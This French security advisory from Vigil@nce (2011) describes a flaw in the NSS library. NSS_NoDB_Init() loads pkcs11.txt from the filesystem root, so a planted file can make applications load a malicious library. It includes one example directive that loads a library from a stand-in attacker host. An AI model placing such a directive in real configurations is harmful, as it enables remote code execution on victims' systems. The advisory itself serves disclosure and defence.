Ce bulletin a été rédigé par Vigil@nce : http://vigilance.fr/offre

SYNTHÈSE DE LA VULNÉRABILITÉ

Lorsqu’un attaquant peut déposer un fichier illicite à la racine
du répertoire courant d’une application liée à NSS, il peut
charger une bibliothèque illicite, afin de faire exécuter du code.

– Gravité : 2/4
– Date création : 24/10/2011

PRODUITS CONCERNÉS

– Debian Linux
– Microsoft Windows - plateforme
– Unix - plateforme

DESCRIPTION DE LA VULNÉRABILITÉ

La bibliothèque NSS (Network Security Services) implémente
notamment des fonctionnalités de cryptographie.

La fonction NSS_NoDB_Init() charge le fichier pkcs11.txt, qui
contient des directives de configuration. La directive "library"
indique le nom d’une bibliothèque à charger. Par exemple :
library=\www.attacker.dom\dir\malicious.lib

Cependant, NSS_NoDB_Init() accepte de charger les fichiers situés
à la racine du système de fichiers contenant le répertoire courant
(\pkcs11.txt). Ainsi, si une application liée à NSS est démarrée
depuis un partage réseau, le fichier pkcs11.txt est recherché à la
racine de ce partage réseau.

Lorsqu’un attaquant peut déposer un fichier illicite à la racine
du répertoire courant d’une application liée à NSS, il peut donc
charger une bibliothèque illicite, afin de faire exécuter du code.

Le fichier secmod.db est aussi recherché à la racine.

ACCÈS AU BULLETIN VIGIL@NCE COMPLET

http://vigilance.fr/vulnerabilite/NSS-execution-de-code-via-pkcs11-txt-11095